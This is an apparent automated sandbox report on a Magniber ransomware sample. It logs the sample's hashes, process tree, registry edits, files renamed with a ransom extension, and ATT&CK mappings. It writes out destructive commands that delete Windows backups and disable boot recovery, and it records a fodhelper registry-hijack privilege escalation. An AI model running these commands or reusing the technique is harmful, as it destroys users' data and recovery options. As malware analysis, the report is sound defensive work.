magniber | 71ceb2ad434eb37db1b45f4f2bb9e9cf42ce6f328759ee4f21a40c5b1557c345

Analysis

max time kernel
173s
max time network
162s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
13-10-2022 18:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

magniber.js
Size

172KB
MD5

66422ca83d86f5f9e18aa3da2765606c
SHA1

ef9b4fd687b41d504120f8970a157007ce2aef33
SHA256

6155453a58b0ba360fd18a32d838c4452fec374c364824b50447500c8fd12e80
SHA512

fd7f6b9678e8d7908a67d0166645c7dcfb50737954b3abdff84cde85fe7de5b9e4652affaba3ee742255d2c18f272a43906d3c218dc107fdf57f014805f6386f
SSDEEP

768:lf2dpCbpst8Z7BE4/wKw2pZSbIgMcLtKOXvSIhjIilDuBoWZq2g85UIIofMzVc2t:+45BcLs1ICiZ25PfIW5Yrh

Score

10^/10

magniber evasion ransomware

Malware Config

Signatures

Detect magniber ransomware 3 IoCs

resource	yara_rule
behavioral2/memory/4384-133-0x0000016A41A6B000-0x0000016A41A76000-memory.dmp	family_magniber
behavioral2/memory/2360-134-0x000001DB942A0000-0x000001DB942AB000-memory.dmp	family_magniber
behavioral2/memory/4384-147-0x0000016A41A6B000-0x0000016A41A76000-memory.dmp	family_magniber

Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
ransomware magniber

Process spawned unexpected child process 12 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1396	904	bcdedit.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	384	904	bcdedit.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4120	904	wbadmin.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3708	904	wbadmin.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4320	904	bcdedit.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5048	904	bcdedit.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4296	904	wbadmin.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3004	904	wbadmin.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4844	904	bcdedit.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	456	904	wbadmin.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5116	904	bcdedit.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4824	904	wbadmin.exe	90

Modifies boot configuration data using bcdedit 1 TTPs 6 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
1396	bcdedit.exe
384	bcdedit.exe
4320	bcdedit.exe
5048	bcdedit.exe
4844	bcdedit.exe
5116	bcdedit.exe

Deletes System State backups 3 TTPs 3 IoCs

Uses wbadmin.exe to inhibit system recovery.

ransomware

Command-Line Interface

T1059

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
3708	wbadmin.exe
3004	wbadmin.exe
4824	wbadmin.exe

Deletes backup catalog 3 TTPs 3 IoCs

Uses wbadmin.exe to inhibit system recovery.

ransomware

Command-Line Interface

T1059

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
4120	wbadmin.exe
4296	wbadmin.exe
456	wbadmin.exe

Modifies extensions of user files 10 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File renamed	C:\Users\Admin\Pictures\WriteGrant.raw => C:\Users\Admin\Pictures\WriteGrant.raw.kuwjqqa	sihost.exe
File renamed	C:\Users\Admin\Pictures\ExportUnpublish.tif => C:\Users\Admin\Pictures\ExportUnpublish.tif.kuwjqqa	sihost.exe
File opened for modification	C:\Users\Admin\Pictures\InitializeExit.tiff	sihost.exe
File renamed	C:\Users\Admin\Pictures\InitializeExit.tiff => C:\Users\Admin\Pictures\InitializeExit.tiff.kuwjqqa	sihost.exe
File renamed	C:\Users\Admin\Pictures\OpenRead.tif => C:\Users\Admin\Pictures\OpenRead.tif.kuwjqqa	sihost.exe
File renamed	C:\Users\Admin\Pictures\OptimizeOut.raw => C:\Users\Admin\Pictures\OptimizeOut.raw.kuwjqqa	sihost.exe
File renamed	C:\Users\Admin\Pictures\ResizeConfirm.crw => C:\Users\Admin\Pictures\ResizeConfirm.crw.kuwjqqa	sihost.exe
File renamed	C:\Users\Admin\Pictures\ExportStart.png => C:\Users\Admin\Pictures\ExportStart.png.kuwjqqa	sihost.exe
File opened for modification	C:\Users\Admin\Pictures\ExportRestart.tiff	sihost.exe
File renamed	C:\Users\Admin\Pictures\ExportRestart.tiff => C:\Users\Admin\Pictures\ExportRestart.tiff.kuwjqqa	sihost.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.3.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.2.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.1.etl	wbadmin.exe

Program crash 1 IoCs

pid	pid_target	Process	procid_target
3300	3284	WerFault.exe	68

Checks SCSI registry key(s) 3 TTPs 4 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	vds.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	vds.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000	vds.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName	vds.exe

Modifies registry class 40 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\ = "wscript.exe /B /E:VBScript.Encode ../../Users/Public/vozneedm.cit"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\ = "wscript.exe /B /E:VBScript.Encode ../../Users/Public/jcmeprevd.cit"	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\ = "wscript.exe /B /E:VBScript.Encode ../../Users/Public/eoxhtag.cit"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\DelegateExecute	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\CurVer	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\ = "wscript.exe /B /E:VBScript.Encode ../../Users/Public/owkzobnclr.cit"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\CurVer	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\CurVer\ = "AppX0enk2acdsmv8ydhntbtea6yjp27223q6"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\ = "wscript.exe /B /E:VBScript.Encode ../../Users/Public/dsdmwgqas.cit"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\ = "wscript.exe /B /E:VBScript.Encode ../../Users/Public/hrdlxntbjowz.cit"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\DelegateExecute	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\CurVer	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\DelegateExecute	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\CurVer	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\CurVer\ = "AppX0enk2acdsmv8ydhntbtea6yjp27223q6"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\CurVer\ = "AppX0enk2acdsmv8ydhntbtea6yjp27223q6"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings	taskhostw.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\CurVer\ = "AppX0enk2acdsmv8ydhntbtea6yjp27223q6"	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\DelegateExecute	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\CurVer	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\DelegateExecute	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\CurVer\ = "AppX0enk2acdsmv8ydhntbtea6yjp27223q6"	taskhostw.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\DelegateExecute	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\CurVer	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\CurVer\ = "AppX0enk2acdsmv8ydhntbtea6yjp27223q6"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\CurVer\ = "AppX0enk2acdsmv8ydhntbtea6yjp27223q6"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\ = "wscript.exe /B /E:VBScript.Encode ../../Users/Public/pfkaciloqt.cit"	taskhostw.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\CurVer\ = "AppX0enk2acdsmv8ydhntbtea6yjp27223q6"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\DelegateExecute	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\DelegateExecute	taskhostw.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\ = "wscript.exe /B /E:VBScript.Encode ../../Users/Public/vocryyslb.cit"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\CurVer	taskhostw.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\CurVer	RuntimeBroker.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
4384	wscript.exe
4384	wscript.exe

Suspicious use of AdjustPrivilegeToken 54 IoCs

description	pid	Process
Token: SeShutdownPrivilege	724	Explorer.EXE
Token: SeCreatePagefilePrivilege	724	Explorer.EXE
Token: SeShutdownPrivilege	724	Explorer.EXE
Token: SeCreatePagefilePrivilege	724	Explorer.EXE
Token: SeShutdownPrivilege	3452	RuntimeBroker.exe
Token: SeShutdownPrivilege	3452	RuntimeBroker.exe
Token: SeBackupPrivilege	2976	vssvc.exe
Token: SeRestorePrivilege	2976	vssvc.exe
Token: SeAuditPrivilege	2976	vssvc.exe
Token: SeShutdownPrivilege	724	Explorer.EXE
Token: SeCreatePagefilePrivilege	724	Explorer.EXE
Token: SeShutdownPrivilege	724	Explorer.EXE
Token: SeCreatePagefilePrivilege	724	Explorer.EXE
Token: SeShutdownPrivilege	724	Explorer.EXE
Token: SeCreatePagefilePrivilege	724	Explorer.EXE
Token: SeShutdownPrivilege	724	Explorer.EXE
Token: SeCreatePagefilePrivilege	724	Explorer.EXE
Token: SeShutdownPrivilege	724	Explorer.EXE
Token: SeCreatePagefilePrivilege	724	Explorer.EXE
Token: SeBackupPrivilege	4312	wbengine.exe
Token: SeRestorePrivilege	4312	wbengine.exe
Token: SeSecurityPrivilege	4312	wbengine.exe
Token: SeShutdownPrivilege	724	Explorer.EXE
Token: SeCreatePagefilePrivilege	724	Explorer.EXE
Token: SeShutdownPrivilege	724	Explorer.EXE
Token: SeCreatePagefilePrivilege	724	Explorer.EXE
Token: SeShutdownPrivilege	724	Explorer.EXE
Token: SeCreatePagefilePrivilege	724	Explorer.EXE
Token: SeShutdownPrivilege	724	Explorer.EXE
Token: SeCreatePagefilePrivilege	724	Explorer.EXE
Token: SeShutdownPrivilege	724	Explorer.EXE
Token: SeCreatePagefilePrivilege	724	Explorer.EXE
Token: SeShutdownPrivilege	724	Explorer.EXE
Token: SeCreatePagefilePrivilege	724	Explorer.EXE
Token: SeShutdownPrivilege	724	Explorer.EXE
Token: SeCreatePagefilePrivilege	724	Explorer.EXE
Token: SeShutdownPrivilege	724	Explorer.EXE
Token: SeCreatePagefilePrivilege	724	Explorer.EXE
Token: SeShutdownPrivilege	724	Explorer.EXE
Token: SeCreatePagefilePrivilege	724	Explorer.EXE
Token: SeShutdownPrivilege	724	Explorer.EXE
Token: SeCreatePagefilePrivilege	724	Explorer.EXE
Token: SeShutdownPrivilege	724	Explorer.EXE
Token: SeCreatePagefilePrivilege	724	Explorer.EXE
Token: SeShutdownPrivilege	724	Explorer.EXE
Token: SeCreatePagefilePrivilege	724	Explorer.EXE
Token: SeShutdownPrivilege	724	Explorer.EXE
Token: SeCreatePagefilePrivilege	724	Explorer.EXE
Token: SeShutdownPrivilege	724	Explorer.EXE
Token: SeCreatePagefilePrivilege	724	Explorer.EXE
Token: SeShutdownPrivilege	724	Explorer.EXE
Token: SeCreatePagefilePrivilege	724	Explorer.EXE
Token: SeShutdownPrivilege	724	Explorer.EXE
Token: SeCreatePagefilePrivilege	724	Explorer.EXE

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 4384 wrote to memory of 2360	4384	wscript.exe	79
PID 4384 wrote to memory of 2372	4384	wscript.exe	78
PID 4384 wrote to memory of 2460	4384	wscript.exe	76
PID 4384 wrote to memory of 724	4384	wscript.exe	69
PID 4384 wrote to memory of 3088	4384	wscript.exe	43
PID 4384 wrote to memory of 3284	4384	wscript.exe	68
PID 4384 wrote to memory of 3380	4384	wscript.exe	67
PID 4384 wrote to memory of 3452	4384	wscript.exe	44
PID 4384 wrote to memory of 3540	4384	wscript.exe	66
PID 4384 wrote to memory of 3836	4384	wscript.exe	65
PID 4384 wrote to memory of 4808	4384	wscript.exe	62
PID 4384 wrote to memory of 3976	4384	wscript.exe	47
PID 2588 wrote to memory of 2020	2588	cmd.exe	99
PID 2588 wrote to memory of 2020	2588	cmd.exe	99
PID 2020 wrote to memory of 3912	2020	fodhelper.exe	100
PID 2020 wrote to memory of 3912	2020	fodhelper.exe	100
PID 2148 wrote to memory of 1552	2148	cmd.exe	105
PID 2148 wrote to memory of 1552	2148	cmd.exe	105
PID 1552 wrote to memory of 1064	1552	fodhelper.exe	112
PID 1552 wrote to memory of 1064	1552	fodhelper.exe	112
PID 5100 wrote to memory of 1336	5100	cmd.exe	129
PID 5100 wrote to memory of 1336	5100	cmd.exe	129
PID 1336 wrote to memory of 4820	1336	fodhelper.exe	130
PID 1336 wrote to memory of 4820	1336	fodhelper.exe	130
PID 2220 wrote to memory of 4456	2220	cmd.exe	133
PID 2220 wrote to memory of 4456	2220	cmd.exe	133
PID 4456 wrote to memory of 5060	4456	fodhelper.exe	134
PID 4456 wrote to memory of 5060	4456	fodhelper.exe	134

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
- Modifies registry class
PID:3088

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:3452

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3976

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
PID:4808

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
PID:3836
- C:\Windows\System32\cmd.exe
  /c fodhelper.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2220
- - C:\Windows\System32\fodhelper.exe
    fodhelper.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4456
  - - C:\Windows\system32\wscript.exe
      "wscript.exe" /B /E:VBScript.Encode ../../Users/Public/owkzobnclr.cit
      4⤵
      PID:5060

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:3540

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:3380

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3284
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 3284 -s 928
  2⤵
  - Program crash
  PID:3300

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:724
- C:\Windows\system32\wscript.exe
  wscript.exe C:\Users\Admin\AppData\Local\Temp\magniber.js
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:4384
- C:\Windows\System32\cmd.exe
  /c fodhelper.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5100
- - C:\Windows\System32\fodhelper.exe
    fodhelper.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1336
  - - C:\Windows\system32\wscript.exe
      "wscript.exe" /B /E:VBScript.Encode ../../Users/Public/owkzobnclr.cit
      4⤵
      PID:4820

C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1⤵
- Modifies registry class
PID:2460

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
- Modifies registry class
PID:2372
- C:\Windows\System32\cmd.exe
  /c fodhelper.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2588
- - C:\Windows\System32\fodhelper.exe
    fodhelper.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2020
  - - C:\Windows\system32\wscript.exe
      "wscript.exe" /B /E:VBScript.Encode ../../Users/Public/jcmeprevd.cit
      4⤵
      PID:3912

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
- Modifies extensions of user files
- Modifies registry class
PID:2360
- C:\Windows\System32\cmd.exe
  /c fodhelper.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2148
- - C:\Windows\System32\fodhelper.exe
    fodhelper.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1552
  - - C:\Windows\system32\wscript.exe
      "wscript.exe" /B /E:VBScript.Encode ../../Users/Public/jcmeprevd.cit
      4⤵
      PID:1064

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 456 -p 3284 -ip 3284
1⤵
PID:2568

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2976

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled no
1⤵
- Process spawned unexpected child process
- Modifies boot configuration data using bcdedit
PID:1396

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy ignoreallfailures
1⤵
- Process spawned unexpected child process
- Modifies boot configuration data using bcdedit
PID:384

C:\Windows\system32\wbadmin.exe
wbadmin delete catalog -quiet
1⤵
- Process spawned unexpected child process
- Deletes backup catalog
PID:4120

C:\Windows\system32\wbadmin.exe
wbadmin delete systemstatebackup -quiet
1⤵
- Process spawned unexpected child process
- Deletes System State backups
- Drops file in Windows directory
PID:3708

C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4312

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy ignoreallfailures
1⤵
- Process spawned unexpected child process
- Modifies boot configuration data using bcdedit
PID:4320

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled no
1⤵
- Process spawned unexpected child process
- Modifies boot configuration data using bcdedit
PID:5048

C:\Windows\system32\wbadmin.exe
wbadmin delete catalog -quiet
1⤵
- Process spawned unexpected child process
- Deletes backup catalog
PID:4296

C:\Windows\system32\wbadmin.exe
wbadmin delete systemstatebackup -quiet
1⤵
- Process spawned unexpected child process
- Deletes System State backups
PID:3004

C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
1⤵
PID:1220

C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
1⤵
- Checks SCSI registry key(s)
PID:3208

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy ignoreallfailures
1⤵
- Process spawned unexpected child process
- Modifies boot configuration data using bcdedit
PID:4844

C:\Windows\system32\wbadmin.exe
wbadmin delete catalog -quiet
1⤵
- Process spawned unexpected child process
- Deletes backup catalog
PID:456

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled no
1⤵
- Process spawned unexpected child process
- Modifies boot configuration data using bcdedit
PID:5116

C:\Windows\system32\wbadmin.exe
wbadmin delete systemstatebackup -quiet
1⤵
- Process spawned unexpected child process
- Deletes System State backups
PID:4824

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Persistence

Privilege Escalation

Defense Evasion

File Deletion

T1107

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Public\jcmeprevd.cit

Filesize
887B

MD5
08f4af03b9d315186edc56e83ce0e064

SHA1
019422a579f9f51d299804a40e2a455d66d231ee

SHA256
9eb91e8dda3b936f34cfe8dab1e879ae019fee04b7ae5c676fb10523ca708260

SHA512
f12b5a3fbbff83fdb8a1e2689f60fe9801ebeee2ab44920c525983342883c0a493c0359863c32227d1df4a15af8356f063f567c5b9e2b2bdc77750b82ebf7181

Download Submit
C:\Users\Public\owkzobnclr.cit

Filesize
887B

MD5
08f4af03b9d315186edc56e83ce0e064

SHA1
019422a579f9f51d299804a40e2a455d66d231ee

SHA256
9eb91e8dda3b936f34cfe8dab1e879ae019fee04b7ae5c676fb10523ca708260

SHA512
f12b5a3fbbff83fdb8a1e2689f60fe9801ebeee2ab44920c525983342883c0a493c0359863c32227d1df4a15af8356f063f567c5b9e2b2bdc77750b82ebf7181

Download Submit
memory/2360-134-0x000001DB942A0000-0x000001DB942AB000-memory.dmp

Filesize
44KB

Download
memory/4384-147-0x0000016A41A6B000-0x0000016A41A76000-memory.dmp

Filesize
44KB

Download
memory/4384-148-0x00007FFB54730000-0x00007FFB551F1000-memory.dmp

Filesize
10.8MB

Download
memory/4384-132-0x00007FFB54730000-0x00007FFB551F1000-memory.dmp

Filesize
10.8MB

Download
memory/4384-143-0x00007FFB54730000-0x00007FFB551F1000-memory.dmp

Filesize
10.8MB

Download
memory/4384-133-0x0000016A41A6B000-0x0000016A41A76000-memory.dmp

Filesize
44KB

Download